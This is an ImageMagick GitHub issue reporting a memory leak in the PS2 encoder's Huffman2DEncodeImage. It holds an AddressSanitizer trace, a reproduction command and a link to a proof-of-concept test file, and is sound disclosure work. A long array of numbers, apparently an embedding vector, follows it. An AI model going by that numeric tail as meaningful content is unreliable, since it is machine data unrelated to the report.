This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : memory leak in Huffman2DEncodeImage Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description ``` ==85960==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13024 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f1f0 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412eef in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4153a9 in AcquireImageInfo MagickCore/image.c:349 #4 0x418321 in CloneImageInfo MagickCore/image.c:944 #5 0x64faad in Huffman2DEncodeImage coders/ps2.c:207 #6 0x652046 in WritePS2Image coders/ps2.c:766 #7 0x809316 in WriteImage MagickCore/constitute.c:1159 #8 0x80a03b in WriteImages MagickCore/constitute.c:1376 #9 0xb1573d in CompositeImageCommand MagickWand/composite.c:1676 #10 0xc9d45d in MagickCommandGenesis MagickWand/mogrify.c:184 #11 0x40e9e1 in MagickMain utilities/magick.c:149 #12 0x40ebc2 in main utilities/magick.c:180 #13 0x7ffff31f282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: 13024 byte(s) leaked in 1 allocation(s). ``` ### Steps to Reproduce /usr/local/bin/magick composite Memory-Leak-input1 Memory-Leak-input2 output.ps2 ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: '7.0.8-40' - Environment (Operating system, version and so on): Linux ubuntu 4.15.0-42-generic #45~16.04.1-Ubuntu SMP Mon Nov 19 13:02:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux - Additional information: ' ./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" -disable-shared' <!-- Thanks for reporting the issue to ImageMagick! --> testcase: [ https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip](https://github.com/butterflyhack/pocs/blob/master/memory-leak-1.zip) credit: ADlab of venustech --- end body ---
2,393
[ -0.02736794762313366, 0.014477833174169064, -0.0028255993966013193, 0.006589701399207115, 0.04736242815852165, 0.01070363912731409, -0.0005932917702011764, 0.03877798840403557, -0.026251163333654404, 0.0339341014623642, 0.007460927590727806, -0.0223626010119915, -0.006441693753004074, 0.03275004029273987, 0.019388994202017784, -0.030166637152433395, -0.025067102164030075, 0.01952354609966278, -0.005281179677695036, -0.025524580851197243, 0.01175987534224987, -0.03530653566122055, -0.01653648354113102, -0.0031384334433823824, -0.01975228451192379, -0.0024118509609252214, -0.012062618508934975, -0.0029113765340298414, -0.002213386120274663, 0.012735379859805107, 0.023788854479789734, 0.03226565197110176, -0.024179058149456978, -0.010407623834908009, 0.029386233538389206, -0.006969811860471964, 0.0319158174097538, 0.07131274789571762, 0.012062618508934975, 0.025712953880429268, 0.013549421913921833, -0.0754031389951706, -0.03673279285430908, 0.018285663798451424, 0.009802138432860374, -0.022510608658194542, 0.013939623720943928, -0.026331894099712372, -0.031243056058883667, 0.018554769456386566, 0.002117517637088895, -0.02548421546816826, -0.019456269219517708, -0.03684043511748314, -0.002194885164499283, 0.001996420556679368, 0.04101155698299408, 0.04103846848011017, 0.01354269403964281, 0.04784681648015976, -0.016899775713682175, 0.06732999533414841, 0.023587027564644814, 0.01972537487745285, 0.0009721406968310475, -0.027462134137749672, 0.006535880267620087, 0.03188890591263771, 0.02140727825462818, -0.0028390546794980764, -0.029736069962382317, -0.015056408010423183, 0.014558563940227032, 0.07933206856250763, 0.020990166813135147, -0.025470759719610214, 0.04281455650925636, 0.0018299119547009468, -0.03982749581336975, 0.016052095219492912, -0.036221493035554886, 0.04324512556195259, -0.009210108779370785, 0.03565637394785881, 0.035198893398046494, 0.017101604491472244, -0.06469277292490005, -0.06216318532824516, -0.0017491804901510477, -0.018460582941770554, -0.004016387742012739, 0.01917370967566967, 0.009351388551294804, -0.024582713842391968, -0.020761428400874138, 0.014989132061600685, -0.052179399877786636, -0.019052613526582718, -0.01914680004119873, -0.007817491888999939, -0.02769087441265583, -0.017101604491472244, -0.015258236788213253, 0.030247367918491364, 0.002342892810702324, 0.006192771717905998, 0.008712264709174633, -0.05818043649196625, 0.023842675611376762, 0.11700672656297684, 0.02754286676645279, -0.001070532132871449, -0.02007521130144596, 0.002356348093599081, 0.00045789845171384513, 0.003008926985785365, 0.013589787296950817, 0.008644988760352135, -0.02691047079861164, -0.03143142908811569, -0.030570294708013535, -0.030085904523730278, -0.017962738871574402, 0.015917543321847916, -0.01977919600903988, 0.018056925386190414, 0.012398999184370041, -0.032507847994565964, 0.010091425850987434, -0.029789891093969345, -0.032803863286972046, -0.028659651055932045, 0.01217698771506548, -0.01091892272233963, -0.013858892023563385, -0.033664997667074203, 0.006552699487656355, 0.04111919924616814, 0.008523891679942608, 0.002083879429847002, -0.0683525949716568, -0.0474969781935215, 0.011140934191644192, -0.015096773393452168, -0.0008577711996622384, 0.008853544481098652, -0.041603587567806244, 0.012721925042569637, -0.0042182160541415215, -0.004019751213490963, -0.000489434169139713, -0.011658960953354836, 0.014302914962172508, 0.006737709045410156, 0.035871654748916626, -0.0019762376323342323, 0.03180817514657974, 0.03632913529872894, -0.025564946234226227, -0.017222700640559196, -0.04908469691872597, -0.020747972652316093, 0.02366775833070278, -0.008436432108283043, -0.0009141150512732565, -0.011214938014745712, 0.0051903571002185345, 0.035871654748916626, 0.006545971613377333, 0.013697429560124874, 0.012863204814493656, 0.007844401523470879, 0.010246161371469498, -0.0025531307328492403, -0.044725202023983, -0.003518543904647231, 0.031216144561767578, -0.020694151520729065, -0.01972537487745285, -0.02216077223420143, 0.007447472773492336, 0.009203380905091763, 0.028229083865880966, -0.00570501945912838, 0.04106537625193596, -0.0042215799912810326, 0.020573053508996964, -0.008221148513257504, 0.018312575295567513, -0.024771086871623993, -0.021245816722512245, 0.006313868798315525, 0.006438329815864563, -0.04257236421108246, 0.04036570340394974, 0.0029399688355624676, -0.01348214503377676, -0.00627013947814703, 0.009492668323218822, -0.011793513782322407, 0.023237191140651703, -0.020115576684474945, -0.04703950136899948, -0.007635845802724361, -0.019967569038271904, -0.02203967422246933, -0.03955839201807976, 0.03883180767297745, 0.014679661020636559, -0.026479901745915413, -0.005136535968631506, -0.022295324131846428, 0.02360048145055771, -0.005694928113371134, 0.0005928712780587375, -0.003121614456176758, -0.017532171681523323, 0.011739692650735378, -0.013939623720943928, 0.012621010653674603, 0.02357357181608677, -0.028363635763525963, -0.001383366296067834, -0.016617214307188988, -0.007810764014720917, -0.02160910703241825, -0.0012168578105047345, 0.010824736207723618, -0.047308605164289474, -0.00730619253590703, 0.02055959962308407, -0.033664997667074203, 0.02244333177804947, 0.00324439350515604, 0.020869068801403046, -0.02578023076057434, -0.035441089421510696, 0.014276004396378994, -0.014693116769194603, -0.005543556995689869, 0.029090218245983124, 0.023075727745890617, 0.005123080685734749, 0.005967396777123213, 0.006313868798315525, 0.04340658709406853, -0.010030877776443958, -0.032507847994565964, -0.020196307450532913, 0.020398136228322983, 0.04555942490696907, -0.020990166813135147, 0.0015582843916490674, -0.021218905225396156, 0.022510608658194542, -0.0007993250619620085, 0.017922373488545418, 0.0024740812368690968, -0.0233717430382967, -0.03412247449159622, 0.003274667775258422, 0.0032612124923616648, -0.01798964850604534, 0.014154907315969467, 0.014141451567411423, -0.010770916007459164, -0.0008005864801816642, 0.04545178264379501, -0.0003517282602842897, 0.0009317750227637589, 0.0314045175909996, -0.03657132759690285, -0.019039157778024673, -0.02389649674296379, -0.015634983777999878, 0.0014893263578414917, -0.011840607039630413, 0.0007089226855896413, 0.005866482388228178, -0.004339313134551048, 0.004662238992750645, -0.008449887856841087, -0.04249163344502449, 0.03253475949168205, 0.015971364453434944, -0.032050371170043945, 0.009526306763291359, -0.00022096018074080348, -0.03412247449159622, -0.025847505778074265, -0.017222700640559196, 0.016724856570363045, -0.014733482152223587, -0.018756598234176636, 0.011221665889024734, -0.007272554561495781, -0.006808348931372166, 0.01894497126340866, -0.005953941494226456, -0.023856131359934807, -0.02047886699438095, 0.0019459633622318506, -0.011477315798401833, -0.013966534286737442, -0.022725891321897507, 0.02995135262608528, -0.03374572843313217, 0.007972226478159428, -0.00903519056737423, -0.029386233538389206, 0.025174744427204132, -0.02670864202082157, 0.0275159552693367, -0.0326693095266819, -0.039639122784137726, -0.0008241331670433283, 0.02812144160270691, -0.03990822657942772, 0.021555285900831223, 0.00530809024348855, -0.026372261345386505, 0.013098671101033688, -0.032884594053030014, 0.022524062544107437, 0.035925477743148804, -0.004776608198881149, -0.032023459672927856, 0.07518785446882248, -0.05457443371415138, 0.025295842438936234, -0.014545109122991562, -0.0386972539126873, -0.0033755821641534567, -0.019846471026539803, 0.021205449476838112, -0.021165084093809128, -0.01929480768740177, 0.03264240175485611, 0.008671899326145649, 0.007265826687216759, -0.023062271997332573, -0.019106432795524597, -0.019187165424227715, -0.02090943604707718, 0.041899602860212326, -0.004487320780754089, -0.013139036484062672, 0.011100568808615208, 0.0285250972956419, -0.03075866773724556, 0.0008636579150334001, 0.025618767365813255, 0.014639295637607574, 0.03296532481908798, 0.005096170119941235, 0.007810764014720917, -0.0223626010119915, 0.012654648162424564, -0.002509401412680745, 0.012594100087881088, 0.006519061513245106, -0.027637053281068802, 0.015486975200474262, -0.022806623950600624, 0.022228047251701355, 0.017734000459313393, -0.0074138343334198, -0.0256322231143713, -0.011712782084941864, -0.01653648354113102, -0.005614196881651878, 0.049138519912958145, -0.04929998144507408, 0.01054217666387558, -0.0014767120592296124, -0.02528238669037819, 0.021716749295592308, 0.017787819728255272, -0.005409004632383585, 0.002640589838847518, -0.008914093486964703, 0.03264240175485611, 0.04585544019937515, -0.028175262734293938, 0.0006424874882213771, 0.03350353613495827, -0.026856649667024612, 0.00870553683489561, -0.006485423073172569, -0.03748628497123718, -0.052583057433366776, 0.020949801430106163, -0.02186475694179535, -0.0474969781935215, 0.00208219769410789, 0.09133413434028625, 0.014625840820372105, -0.026466447860002518, 0.020357770845294, -0.06377781182527542, -0.010353803634643555, -0.03234638646245003, 0.03258857876062393, 0.009358115494251251, -0.001920734765008092, 0.060602378100156784, 0.010602724738419056, -0.011510953307151794, 0.014006899669766426, -0.004389770328998566, 0.013953078538179398, 0.00375401065684855, -0.06194790080189705, 0.02279316820204258, -0.011362945660948753, 0.029117127880454063, 0.0008687035879120231, 0.004413316957652569, -0.009829048998653889, 0.007111091632395983, -0.021340003237128258, -0.009755045175552368, 0.006525788921862841, 0.021151630207896233, 0.02369466796517372, 0.0014186863554641604, 0.015312056988477707, 0.005244177766144276, 0.028955666348338127, -0.019388994202017784, -0.01877005212008953, -0.0050894427113235, -0.026116611436009407, -0.005479644518345594, -0.011315852403640747, -0.04666275531053543, -0.04257236421108246, -0.011295669712126255, -0.0021444279700517654, -0.0037001895252615213, 0.020586509257555008, 0.02670864202082157, -0.009028462693095207, -0.01899879239499569, -0.012728651985526085, -0.02218768186867237, -0.040419526398181915, 0.006868897471576929, -0.014908400364220142, -0.028175262734293938, -0.0339341014623642, 0.03805140405893326, 0.0019039157778024673, -0.03277695178985596, 0.012385543435811996, -0.007454200182110071, -0.02814835123717785, -0.024515438824892044, 0.02691047079861164, -0.006387872621417046, -0.011093840934336185, 0.03463377431035042, -0.03525271639227867, -0.010562359355390072, -0.008840089663863182, 0.046124543994665146, 0.020021390169858932, -0.006495514884591103, 0.004349404480308294, -0.003952475264668465, 0.017128514125943184, 0.02125927060842514, 0.017505260184407234, -0.009459029883146286, -0.018460582941770554, 0.010313437320291996, -0.0050558047369122505, -0.02374848909676075, 0.025753319263458252, -0.04631291702389717, -0.012076073326170444, -0.05586613714694977, -0.01190115511417389, -0.0005167651106603444, 0.03145834058523178, 0.007238916587084532, 0.022483697161078453, -0.0008922502747736871, 0.000571426993701607, 0.019362082704901695, -0.0009755045175552368, 0.011201483197510242, -0.019967569038271904, -0.020694151520729065, -0.0008644988411106169, 0.03538726642727852, -0.014760392718017101, -0.053336549550294876, 0.03388028219342232, 0.0036261859349906445, -0.006155769806355238, -0.02201276458799839, 0.03331516310572624, -0.019012246280908585, 0.03145834058523178, -0.033638086169958115, -0.01781473122537136, 0.002987062092870474, -0.03498361259698868, -0.027462134137749672, 0.001406072056852281, -0.029117127880454063, 0.006118767894804478, -0.04265309497714043, 0.005577194970101118, -0.008362428285181522, 0.027435224503278732, 0.0017794548766687512, 0.031323786824941635, 0.011665688827633858, -0.019671553745865822, -0.011591685004532337, 0.010636363178491592, 0.021770570427179337, -0.009526306763291359, 0.014800758101046085, 0.04642055928707123, 0.02522856555879116, 0.00932447798550129, -0.03423011675477028, 0.02143418975174427, 0.0033183973282575607, -0.004248490557074547, 0.031323786824941635, 0.001247973064891994, -0.009936691261827946, -0.01653648354113102, -0.004483956843614578, -0.0131928576156497, 0.014894945546984673, -0.01141003891825676, 0.03256166726350784, 0.002379894722253084, 0.00441668089479208, -0.03573710471391678, 0.006852078251540661, -0.03183508664369583, 0.01874314248561859, -0.004420044831931591, -0.015486975200474262, 0.0035555458161979914, -0.015998274087905884, 0.0018013195367529988, 0.009506123140454292, -0.019066067412495613, 0.02103053219616413, -0.005281179677695036, 0.0007787217036820948, 0.015675349161028862, -0.0008956140954978764, -0.003589184023439884, 0.004870795179158449, 0.025268930941820145, 0.013764705508947372, -0.008416249416768551, 0.0026860013604164124, 0.029897531494498253, 0.003629549639299512, -0.04851957783102989, -0.025470759719610214, 0.01374452281743288, -0.013280317187309265, -0.010548904538154602, -0.03974676504731178, -0.0028827839996665716, -0.008725719526410103, 0.023331377655267715, 0.004571415949612856, -0.022376054897904396, -0.03237329423427582, 0.031269967555999756, -0.007434017490595579, 0.024771086871623993, 0.03223874419927597, 0.022887354716658592, -0.028336724266409874, 0.0052004484459757805, 0.0037170087452977896, -0.015742624178528786, 0.002289071911945939, 0.02847127802670002, 0.011147662065923214, 0.0012042435118928552, 0.011712782084941864, 0.012594100087881088, -0.002711229957640171, 0.004494048655033112, -0.00144980160985142, 0.017949283123016357, 0.01668449118733406, -0.01874314248561859, 0.01969846338033676, 0.010643091052770615, -0.02522856555879116, -0.021151630207896233, 0.00013108341954648495, 0.024892184883356094, -0.022604795172810555, -0.007602207828313112, 0.009216835722327232, 0.024972915649414062, 0.03240020573139191, 0.04015042260289192, 0.008887182921171188, -0.001079782610759139, -0.013159220106899738, 0.0212323609739542, 0.005997670814394951, -0.016227012500166893, -0.020640330389142036, 0.03277695178985596, -0.048411935567855835, 0.009136104956269264, 0.008281697519123554, -0.004107210319489241, 0.015527341514825821, -0.03199654817581177, -0.018958425149321556, -0.010380714200437069, -0.025134379044175148, -0.0006740231765434146, 0.02927859127521515, 0.02879420295357704, -0.010279799811542034, -0.022133860737085342, 0.04017733037471771, 0.029897531494498253, -0.027031566947698593, 0.008570984937250614, -0.01360996998846531, -0.011423494666814804, 0.002971925074234605, -0.010259617120027542, -0.008624806068837643, -0.030839398503303528, -0.02407141588628292, -0.013939623720943928, 0.021178539842367172, 0.0036833705380558968, 0.015661893412470818, -0.02927859127521515, -0.00480015529319644, 0.021716749295592308, 0.020599965006113052, 0.00031409563962370157, -0.0005104579613544047, 0.022228047251701355, 0.03261549025774002, -0.0059270309284329414, -0.027394859120249748, 0.013172674924135208, 0.0008115188684314489, -0.006216318346560001, 0.00933793280273676, 0.02360048145055771, 0.03560255095362663, -0.04208797588944435, -0.0056276521645486355, 0.024017594754695892, -0.02656063437461853, 0.035198893398046494, -0.0008644988411106169, 0.016294289380311966, 0.016253923997282982, -0.011295669712126255, -0.016523027792572975, -0.006677160505205393, 0.015338967554271221, -0.02809453010559082, 0.024636534973978996, 0.015164049342274666, -0.024919094517827034, 0.0077838534489274025, 0.009492668323218822, -0.027986887842416763, 0.0014186863554641604, 0.0034748143516480923, 0.003278031712397933, -0.024313610047101974, -0.028982575982809067, 0.02093634568154812, -0.004652147646993399, 0.013562876731157303, 0.006011126097291708, -0.002252070000395179, 0.013993443921208382, 0.01426254864782095, 0.004833793267607689, -0.004729514941573143, -0.01404726505279541, -0.04284146800637245, 0.03993513807654381, 0.009499396197497845, 0.008739175274968147, -0.02334483340382576, 0.015244781039655209, -0.011416766792535782, -0.0038145591970533133, -0.004026479087769985, 0.014962221495807171, -0.018985336646437645, 0.027408313006162643, -0.03277695178985596, 0.016267379745841026, -0.010663273744285107, -0.025295842438936234, -0.005193720571696758, -0.024219423532485962, -0.010966016910970211, -0.022106951102614403, 0.007548386696726084, -0.021999308839440346, -0.024434706196188927, -0.06711471080780029, 0.005324909463524818, 0.00883336178958416, 0.010481627658009529, 0.011383128352463245, 0.01404726505279541, 0.02065378613770008, -0.014854579232633114, -0.036275312304496765, -0.016993962228298187, 0.009506123140454292, 0.00035446134279482067, 0.0022487060632556677, 0.012573917396366596, 0.0024068050552159548, 0.013502328656613827, 0.015675349161028862, 0.007312920410186052, -0.016025185585021973, -0.006969811860471964, -0.03754010424017906, 0.0037607380654662848, -0.005513282492756844, -0.004443591460585594, 0.014935310930013657, -0.017020871862769127, 0.03237329423427582, 0.025793684646487236, 0.017707088962197304, 0.01297757402062416, -0.048062101006507874, -0.006996721960604191, 0.017074692994356155, 0.00919665303081274, -0.04666275531053543, 0.022174227982759476, -0.027959978207945824, 0.011288941837847233, -0.0040937550365924835, 0.029493875801563263, 0.04668966680765152, -0.002265525283291936, 0.02731412649154663, 0.04200724512338638, -0.015890631824731827, 0.007669483777135611, 0.009929963387548923, 0.009459029883146286, 0.015917543321847916, -0.030839398503303528, -0.009257202036678791, 0.027583232149481773, -0.04819665104150772, 0.014989132061600685, 0.022550974041223526, 0.007716577034443617, 0.026870103552937508, -0.011477315798401833, 0.03406865522265434, -0.037755388766527176, 0.05500499904155731, 0.01628083363175392, 0.013065033592283726, 0.032857682555913925, -0.00023105161380954087, -0.02545730397105217, 0.0024639898911118507, -0.012311539612710476, -0.022470243275165558, 0.04208797588944435, -0.024892184883356094, -0.032507847994565964, -0.024219423532485962, 0.02100362256169319, -0.0036261859349906445, -0.016173193231225014, -0.029386233538389206, -0.019429359585046768, 0.04668966680765152, -0.026224253699183464, -0.031296875327825546, -0.044994305819272995, -0.014787303283810616, -0.004786700010299683, 0.027556320652365685, -0.007279281970113516, 0.041926510632038116, 0.006714162416756153, -0.006051491945981979, 0.015648437663912773, 0.014343280345201492, 0.02691047079861164, -0.003254484850913286, -0.003427721094340086, -0.022429876029491425, -0.0013371140230447054, -0.029090218245983124, -0.026426080614328384, 0.017559081315994263, 0.015460064634680748, -0.04886941239237785, -0.027959978207945824, 0.007696394342929125, 0.022308779880404472, -0.002452216576784849, -0.014894945546984673, 0.017303431406617165, -0.015648437663912773, -0.037405554205179214, 0.011537863872945309, 0.014074175618588924, 0.021743658930063248, 0.02045195735991001, 0.001396821578964591, 0.01245282031595707, -0.02922477014362812, 0.02892875485122204, 0.00039629871025681496, -0.0016617215005680919, -0.01233845017850399, -0.026897015050053596, -0.002788597485050559, -0.028632739558815956, -0.035925477743148804, 0.01502949744462967, -0.010104881599545479, -0.0019409176893532276, 0.02892875485122204, 0.037459373474121094, -0.016415387392044067, 0.02201276458799839, 0.0015389424515888095, -0.00903519056737423, 0.0055031911469995975, -0.0038919267244637012, -0.005708383396267891, -0.010239433497190475, 0.040419526398181915, -0.006196135655045509, -0.008348973467946053, -0.006895808037370443, 0.03350353613495827, 0.00019026543304789811, -0.0027633688878268003, 0.016079004853963852, 0.03805140405893326, -0.02082870341837406, -0.020626874640583992, -0.020438501611351967, 0.035145074129104614, 0.011618595570325851, -0.020895980298519135, -0.0356832817196846, -0.0030223822686821222, -0.026843193918466568, 0.0017357253236696124, 0.012096256017684937, -0.011295669712126255, -0.008248059079051018, 0.03554873168468475, 0.024811454117298126, 0.02719303034245968, -0.029870621860027313, 0.008988097310066223, -0.0138858025893569, -0.01766672357916832, 0.0013665473088622093, -0.0010150292655453086, 0.025672588497400284, -0.049165427684783936, -0.004046661779284477, -0.004749698098748922, 0.023183370009064674, -0.010548904538154602, -0.002270570956170559, -0.00015841436106711626, -0.018056925386190414, -0.009694497101008892, -0.015769535675644875, 0.008732447400689125, 0.020963255316019058, -0.018810419365763664, -0.026318440213799477, 0.01992720365524292, -0.0022924356162548065, -0.011013110168278217, -0.014302914962172508, 0.027475589886307716, -0.0053450921550393105, 0.002410168992355466, -0.03772847726941109, -0.011988614685833454, 0.018783507868647575, -0.012647921219468117, -0.00375401065684855, -0.011941521428525448, 0.020801793783903122, 0.005970760714262724, -0.01303139515221119, 0.006865533534437418, 0.010508538223803043, 0.006145678460597992, -0.02960151620209217, -0.01867586560547352, -0.010999654419720173, 0.012668103910982609, -0.005096170119941235, -0.0069294460117816925, 0.01348214503377676, 0.019106432795524597, 0.021353457123041153, 0.025147834792733192, -0.010838191956281662, -0.008826633915305138, 0.02643953636288643, -0.024865273386240005, -0.030597204342484474, 0.013704156503081322, 0.0038952904287725687, 0.009250474162399769, 0.004214852582663298, -0.023156458511948586, 0.02369466796517372, 0.0033352163154631853, -0.036248404532670975, -0.020021390169858932, -0.026829738169908524, -0.0459899939596653, 0.0005125603638589382, -0.0020216491539031267, -0.006424874532967806, -0.02264516055583954, 0.024986371397972107, -0.0133812315762043, 0.0002836111234501004, 0.004140848759561777, 0.026076246052980423, 0.026143521070480347, -0.0038919267244637012, -0.013717612251639366, -0.010199068114161491, 0.0035151802003383636, -0.012708469294011593, -0.0799240991473198, -0.024286698549985886, -0.031216144561767578, -0.007440744899213314, -0.002509401412680745, -0.01203570794314146, 0.021420734003186226, 0.016617214307188988, -0.004013023804873228, 0.03234638646245003, -0.005045712925493717, -0.008086596615612507, -0.008712264709174633, 0.002376530785113573, 0.00017901769024319947, -0.023075727745890617, 0.05355183407664299, 0.00026279754820279777, 0.020586509257555008, -0.02844436652958393, 0.021972399204969406, 0.019066067412495613, -0.020788338035345078, -0.006310505326837301, 0.013448507525026798, 0.005997670814394951, 0.023075727745890617, -0.03344971314072609, 0.004857339896261692, 0.006969811860471964, -0.013845437206327915, -0.026197342202067375, -0.00730619253590703, -0.001799637684598565, -0.018837329000234604, 0.007400379050523043, 0.0009225245448760688, -0.02271243743598461, 0.001320294919423759, 0.02560531161725521, 0.005526737775653601, 0.02927859127521515, -0.018662411719560623, 0.033961012959480286, -0.0001468512782594189, 0.0019173709442839026, 0.015164049342274666, -0.025564946234226227, 0.01375797763466835, 0.02505364827811718, 0.006989994551986456, -0.016926685348153114, -0.017760910093784332, 0.022846989333629608, -0.013071760535240173, 0.009755045175552368, -0.0066569773480296135, -0.0242463331669569, 0.007259099278599024, 0.016819043084979057, -0.008409521542489529, 0.009385026060044765, 0.027260305359959602, 0.006303777452558279, 0.008988097310066223, -0.0024606261868029833, 0.005479644518345594, 0.0077838534489274025, -0.013562876731157303, -0.009815594181418419, 0.02045195735991001, -0.031027771532535553, -0.04631291702389717, 0.0008523050346411765, 0.024219423532485962, -0.019940657541155815, -0.000825394585262984, -0.01441055629402399, 0.0029298774898052216, 0.008927548304200172, 0.008281697519123554, -0.024111781269311905, 0.0334228053689003, -0.004729514941573143, 0.0031081591732800007, -0.0066569773480296135, 0.06114058941602707, 0.016294289380311966, -0.04284146800637245, -0.003284759121015668, -0.01441055629402399, -0.030220458284020424, 0.0014523244462907314, -0.010246161371469498, -0.010939106345176697, -0.025753319263458252, -0.02012903057038784, -0.02812144160270691, -0.015164049342274666, -0.013461962342262268, -0.0011504226131364703, 0.02557840198278427, 0.006566154770553112, 0.010232706554234028, 0.011087113991379738, 0.004174486733973026, -0.016442297026515007, -0.02586096152663231, 0.010851646773517132, -0.02960151620209217, 0.013623425737023354, -0.007474382873624563, -0.016523027792572975, -0.009156287647783756, -0.002462307922542095, -0.01638847589492798, 0.003575728740543127, -0.0016734948148950934, -0.03272313252091408, 0.013690701685845852, 0.02209349535405636, -0.010656545870006084, 0.005863118451088667, -0.003868380095809698, -0.013374503701925278, -0.022174227982759476, -0.004722787532955408, -0.025120923295617104, -0.006189408246427774, -0.000590348441619426, 0.021165084093809128, 0.07298119366168976, -0.008167327381670475, 0.001464097760617733, -0.010212522931396961, -0.0021763842087239027, -0.0007505498360842466, -0.022497152909636497, -0.016442297026515007, -0.012822838500142097, -0.0007808241061866283, 0.017908917739987373, -0.005183629225939512, 0.017505260184407234, -0.0014035492204129696, -0.007810764014720917, 0.011813696473836899, -0.0023159822449088097, 0.012849749065935612, 0.007582024671137333, 0.029359322041273117, 0.011531135998666286, 0.007582024671137333, 0.010003967210650444, -0.02253751829266548, 0.03194272890686989, -0.011430222541093826, -0.02329101227223873, -0.02545730397105217, -0.039289284497499466, -0.024515438824892044, 0.0038481971714645624, -0.007602207828313112, -0.011726236902177334, 0.010858374647796154, -0.003720372449606657, 0.00527108833193779, 0.053767118602991104, -0.022698981687426567, -0.014894945546984673, -0.03110850229859352, 0.00848352536559105, -0.006852078251540661, -0.025928238406777382, -0.004692513030022383, -0.0011251940159127116, -0.010582542046904564, 0.03175435587763786, -0.014343280345201492, 0.011161117814481258, 0.015204415656626225, -0.010501811280846596, -0.013677245937287807, 0.011840607039630413, -0.0025413574185222387, -0.007252371869981289, 0.02314300462603569, 0.01940244808793068, 0.0000011267445643170504, 0.002265525283291936, -0.018406761810183525, 0.003484905930235982, -0.0006996722077019513, -0.00394574785605073, -0.0011638777796179056, -0.001305998768657446, -0.0027482316363602877, -0.010165429674088955, 0.014733482152223587, -0.046151455491781235, 0.023129548877477646, 0.006687251850962639, 0.005244177766144276, -0.024744177237153053, -0.008974641561508179, 0.011066930368542671, 0.027475589886307716, -0.01723615638911724, 0.0004002932400908321, -0.015352423302829266, -0.04483284428715706, 0.03571019321680069, 0.04259927570819855, -0.010696912184357643, 0.008880455046892166, -0.006098585203289986, 0.007238916587084532, -0.017357252538204193, 0.009593582712113857, -0.006989994551986456, -0.0234928410500288, -0.029144039377570152, -0.019496634602546692, 0.027502499520778656, -0.012607554905116558, 0.018030015751719475, 0.01691322959959507, 0.023048818111419678, -0.028202172368764877, 0.001570057705976069, -0.0009225245448760688, 0.002554812701418996, 0.00037128038820810616, 0.021528376266360283, -0.016845954582095146, -0.011928065679967403, 0.002267207019031048, 0.013704156503081322, 0.031323786824941635, -0.020869068801403046, -0.010609452612698078, -0.035521820187568665, -0.030489562079310417, 0.025793684646487236, -0.0377015694975853, -0.015231326222419739, 0.011309124529361725, 0.010595997795462608, -0.026695186272263527, -0.026224253699183464, -0.01636156626045704, -0.016200102865695953, -0.011450405232608318, 0.05285216122865677, -0.018527857959270477, 0.012950663454830647, 0.007669483777135611, -0.007528204005211592, -0.03194272890686989, 0.032803863286972046, 0.01502949744462967, 0.03466068580746651, -0.008295152336359024, 0.010838191956281662, -0.024986371397972107, 0.0036900981795042753, -0.02606279030442238, 0.02314300462603569, -0.010441262274980545, -0.016253923997282982, 0.013038123026490211, -0.01728997752070427, 0.015513885766267776, 0.02264516055583954, -0.002961833495646715, 0.006670432630926371, -0.014854579232633114, -0.0021292909514158964, 0.01763981394469738, 0.01610591635107994, 0.0008565097814425826, -0.006730981171131134, -0.029090218245983124, -0.0026187251787632704, 0.022887354716658592, 0.015204415656626225, 0.015083318576216698, 0.02178402617573738, -0.02100362256169319, 0.0013774796389043331, -0.01026634406298399, -0.004978436976671219, 0.009304295293986797, 0.013697429560124874, -0.005994307342916727, 0.005903484299778938, 0.022887354716658592, 0.03751319646835327, -0.022429876029491425, -0.010952561162412167, -0.011019837111234665, 0.01711505837738514, -0.0012345177819952369, -0.014572019688785076, 0.0042182160541415215, 0.01882387325167656, 0.014437466859817505, -0.03530653566122055, 0.010246161371469498, 0.012459547258913517, -0.0056276521645486355, -0.010595997795462608, 0.007037087809294462, -0.016496118158102036, -0.006260048132389784, 0.005358547437936068, -0.03143142908811569, 0.006004398688673973, -0.00398274976760149, -0.024784542620182037, 0.01952354609966278, 0.0016146282432600856, 0.024219423532485962, -0.0035319991875439882, -0.019886836409568787, -0.013246678747236729, -0.02841745689511299, 0.016348110511898994, -0.01168587151914835, -0.013199585489928722, 0.009405209682881832, -0.00947248563170433, -0.021151630207896233, 0.0010385758941993117, -0.015634983777999878, 0.010434534400701523, -0.00918319821357727, 0.014491287991404533, -0.002648999448865652, -0.009142831899225712, -0.0014422329841181636, 0.003696825820952654, 0.007871312089264393, 0.0033251249697059393, 0.010104881599545479, 0.014302914962172508, 0.005264360457658768, 0.0004961618105880916, 0.008678626269102097, 0.0005697450833395123, -0.004568052478134632, -0.0029786527156829834, 0.017505260184407234, 0.013966534286737442, 0.009533033706247807, -0.005594013724476099, 0.0003620299103204161, 0.023452473804354668, -0.010535448789596558, -0.00977522786706686, 0.026278072968125343, -0.021151630207896233, 0.013186130672693253, -0.006283594761043787, 0.008739175274968147, -0.00407020840793848, -0.025699498131871223, -0.010407623834908009, 0.00819423794746399, 0.0017744090873748064, -0.002874374622479081, -0.016549939289689064, -0.0018921424634754658, -0.005768931936472654, -0.0007068202830851078, -0.0013623425038531423, -0.00015536590944975615, 0.0182183887809515, 0.0033907191827893257, -0.000729946477804333, 0.01723615638911724, -0.029117127880454063, -0.010656545870006084, 0.015998274087905884, 0.00768966693431139, -0.011827151291072369, 0.009983784519135952, -0.012937208637595177, -0.009230291470885277, 0.007299465127289295, -0.018124202266335487, 0.009021734818816185, -0.023815765976905823, -0.004036570433527231, 0.015298602171242237, -0.024596169590950012, 0.020263584330677986, -0.0059270309284329414, -0.017626358196139336, 0.025564946234226227, 0.028955666348338127, 0.017101604491472244, -0.015634983777999878, 0.0042081247083842754, 